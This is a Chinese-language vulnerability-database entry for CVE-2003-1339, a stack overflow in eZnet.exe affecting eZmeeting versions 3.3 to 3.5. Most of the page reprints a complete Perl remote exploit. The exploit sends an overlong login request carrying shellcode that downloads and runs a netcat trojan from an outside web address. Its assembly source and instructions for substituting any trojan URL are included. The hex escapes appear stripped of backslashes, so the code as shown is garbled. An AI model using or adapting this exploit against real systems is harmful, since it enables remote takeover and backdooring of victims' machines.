@EZmeeting EZmeeting EZmeeting 缓冲区溢出漏洞

漏洞ID	1107596	漏洞类型	缓冲区溢出
发布时间	2003-12-15	更新时间	2003-12-31
CVE编号	CVE-2003-1339	CNNVD-ID	CNNVD-200312-279
漏洞平台	Windows	CVSS评分	10.0

|漏洞来源

https://www.exploit-db.com/exploits/133
https://www.securityfocus.com/bid/78312
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-279

|漏洞详情

eZ(a)eZphotoshare，(b)eZmeeting，(c)eZnetwork，和(d)eZshare中使用的eZnet.exe存在基于堆栈的缓冲区溢出漏洞。远程攻击者借助(1)超长GET请求和(2)超长操作或者SwEzModule.dll的autologin参数导致服务拒绝（崩溃）或者执行任意代码。

|漏洞EXP

#!/usr/bin/perl -w
# 
# Stack Overflow in eZnet.exe - Remote Exploit
# 
# Will download a trojan from any address which you provide
# on the target system, then will execute the trojan.
# 
# For this exploit I have tried several strategies to increase
# reliability and performance:
# 
# + Jump to a static 'call esp'
# + Backwards jump to code a known distance from the stack pointer
#    since the stack address seems to change for each version of
#    eznet.
# + Works out the byte difference for custom urls
#    (must be no longer than 254 bytes!!)
# + Causes eznet.exe to restart (not really my choice ;o)
# + Shellcode steals addresses from a static module.
# 
# (Shellcode is attached to the bottom of this file!)
#
# - by Peter Winter-Smith [[email protected]]

use IO::Socket;

if(!($ARGV[1]))
{
print "nUsage: eZnetexploit.pl <victim> <url of trojan>n" .
      " + netcat trojan at http://www.elitehaven.net/ncat.exen" .
      " + listens on port 9999.nn";
exit;
}

print "eZnet.exe remote trojan downloader exploitn";

$victim = IO::Socket::INET->new(Proto=>'tcp',
                               PeerAddr=>$ARGV[0],
                               PeerPort=>"80")
                           or die "Unable to connect to $ARGV[0] on port 80";

$tlen = chr(length($ARGV[1]) + 1);

$shellcode =            "xEBx3Cx5Fx55x89xE5x81xC4" .
                        "xE8xFFxFFxFFx57x31xDBxB3" .
                        "x07xB0xFFxFCxF2xAExFEx47" .
                        "xFFxFExCBx80xFBx01x75xF4" .
                        "x5Fx57x8Dx7Fx0Bx57x8Dx7F" .
                        "x13x57x8Dx7Fx08x57x8Dx7F" .
                                                    $tlen  .
                            "x57x8Dx7Fx09x47x57x8D" .
                        "x54x24x14x52xEBx02xEBx52" .
                        "x89xD6xFFx36xFFx15x1Cx91" .
                        "x04x10x5Ax52x8Dx72xFCxFF" .
                        "x36x50xFFx15xCCx90x04x10" .
                        "x5Ax52x31xC9x51x51x8Dx72" .
                        "xF0xFFx36x8Dx72xF4xFFx36" .
                        "x51xFFxD0x5Ax52xFFx72xEC" .
                        "xFFx15x1Cx91x04x10x5Ax52" .
                        "x8Dx72xF8xFFx36x50xFFx15" .
                        "xCCx90x04x10x5Ax52x31xC9" .
                        "x41x51x8Dx72xF0xFFx36xFF" .
                        "xD0xCCxE8x6BxFFxFFxFFx55" .
                        "x52x4Cx4Dx4Fx4Ex2Ex44x4C" .
                        "x4CxFFx55x52x4Cx44x6Fx77" .
                        "x6Ex6Cx6Fx61x64x54x6Fx46" .
                        "x69x6Cx65x41xFFx57x69x6E" .
                        "x45x78x65x63xFF" .  $ARGV[1] .
                                                    "xFF" .
                        "x63x3Ax5Cx6Ex63x2Ex65x78" .
                        "x65xFFx6Bx65x72x6Ex65x6C" .
                        "x33x32x2Ex64x6Cx6CxFF";

$jmpcode =              "x89xE0x66x2Dx38x32xFFxE0";

$eip = "xBBx33x05x10";

$packet = "" .
  "GET /SwEzModule.dll?operation=login&autologin=" .
  "x90"x65 . $shellcode . "a"x(4375 - length($ARGV[1])) . $eip . "x90"x20 . $jmpcode .
  "x20HTTP/1.0.User-Agent: SoftwaxAsys/2.1.10nn";
                  
print $victim $packet;

print " + Making Request ...n + Trojan should download - best of luck!n";

sleep(4);
close($victim);

print "Done.n";
exit;

#-----------------------------[vampiric.asm]------------------------------
# ; 'eZnet.exe' (eZmeeting, eZnetwork, eZphotoshare, eZshare, eZ)
# ;   (cryptso.dll vampiric shellcode)
# ; Url Download + Execute
# ; By Peter Winter-Smith
# ; [[email protected]]
# 
# bits 32
# 
# jmp short killnull
# 
# next:
# pop edi
# 
# push ebp
# mov ebp, esp
# add esp, -24
# 
# push edi
# 
# xor ebx, ebx
# mov bl, 07h
# mov al, 0ffh
# 
# cld
# nullify:
# repne scasb
# inc byte [edi-01h]
# dec bl
# cmp bl, 01h
# jne nullify
# 
# pop edi
# 
# push edi		; 'URLMON.DLL'
# lea edi, [edi+11]
# push edi		; 'URLDownloadToFileA'
# lea edi, [edi+19]
# push edi		; 'WinExec'
# lea edi, [edi+08]
# push edi		; 'http://www.elitehaven.net/ncat.exe'
# lea edi, [edi+35]
# push edi		; 'c:nc.exe'
# lea edi, [edi+09]
# inc edi
# push edi		; 'kernel32.dll'
# 
# lea edx, [esp+20]
# push edx
# 
# jmp short over
# killnull:
# jmp short data
# over:
# 
# mov esi, edx
# push dword [esi]
# 
# call [1004911ch]	; LoadLibraryA
# 
# pop edx
# push edx
# lea esi, [edx-04]
# push dword [esi]
# 
# push eax
# 
# call [100490cch]	; GetProcAddress("URLMON.DLL", URLDownloadToFileA);
# 
# pop edx
# push edx
# 
# xor ecx, ecx
# push ecx
# push ecx
# lea esi, [edx-16]	; file path
# push dword [esi]
# lea esi, [edx-12]	; url
# push dword [esi]
# push ecx
# 
# call eax
# 
# pop edx
# push edx
# 
# push dword [edx-20]
# 
# call [1004911ch]	; LoadLibraryA
# 
# pop edx
# push edx
# 
# 
# lea esi, [edx-08]
# push dword [esi]	; 'WinExec'
# push eax		; kernel32.dll handle
# 
# call [100490cch]	; GetProcAddress("kernel32.dll", WinExec);
# 
# pop edx
# push edx
# 
# xor ecx, ecx
# inc ecx
# push ecx
# 
# lea esi, [edx-16]	; file path
# push dword [esi]
# 
# call eax
# 
# int3
# 
# ta:
# call next
# db 'URLMON.DLL',0ffh
# db 'URLDownloadToFileA',0ffh
# db 'WinExec',0ffh
# db 'http://www.elitehaven.net/ncat.exe',0ffh
# ; When altering, you MUST be sure
# ; to also alter the offsets in the 0ffh to null
# ; byte search!
# ; for example:
# ;   db 'http://www.site.com/someguy/trojan.exe',0ffh
# ; count the length of the url, and add one for the 0ffh byte.
# ; The above url is 38 bytes long, plus one for our null, is 39 bytes.
# ; find the code saying (at the start of the shellcode):
# ;   push edi		; 'http://www.elitehaven.net/ncat.exe'
# ;   lea edi, [edi+35]
# ; and make it:
# ;   push edi		; 'http://www.site.com/someguy/trojan.exe'
# ;   lea edi, [edi+39]
# ; same goes for the filename below :o)
# db 'c:nc.exe',0ffh
# db 'kernel32.dll',0ffh
#-------------------------------------------------------------------------

#------------------------------[subcode.asm]------------------------------
# ; eZnet.exe Sub-Shellcode
# ; [[email protected]]
# 
# ;100533BBh
# 
# bits 32
# 
# mov eax, esp
# sub ax, 3238h
# jmp eax
#-----------------------------------------------




# milw0rm.com [2003-12-15]

|受影响的产品

Ezmeeting Ezmeeting 3.5

Ezmeeting Ezmeeting 3.4

Ezmeeting Ezmeeting 3.3

|参考资料

来源:MILW0RM
名称:133
链接:http://www.milw0rm.com/exploits/133
来源:www.governmentsecurity.org
链接:http://www.governmentsecurity.org/archive/t5390.html
来源:SECTRACK
名称:1008412
链接:http://securitytracker.com/id?1008412
来源:BUGTRAQ
名称:20031211eZandeZphotosharefixes
链接:http://seclists.org/bugtraq/2003/Dec/0195.html
来源:BUGTRAQ
名称:20031207eZMultiplePackagesStackOverflowVulnerability
链接:http://marc.info/?l=bugtraq&m;=107090390002654&w;=2

相关推荐: Microsoft Internet Explorer URI Handler Restriction Circumvention Vulnerability

Microsoft Internet Explorer URI Handler Restriction Circumvention Vulnerability 漏洞ID 1101550 漏洞类型 Access Validation Error 发布时间 200…

文章版权归作者所有，未经允许请勿转载。

THE END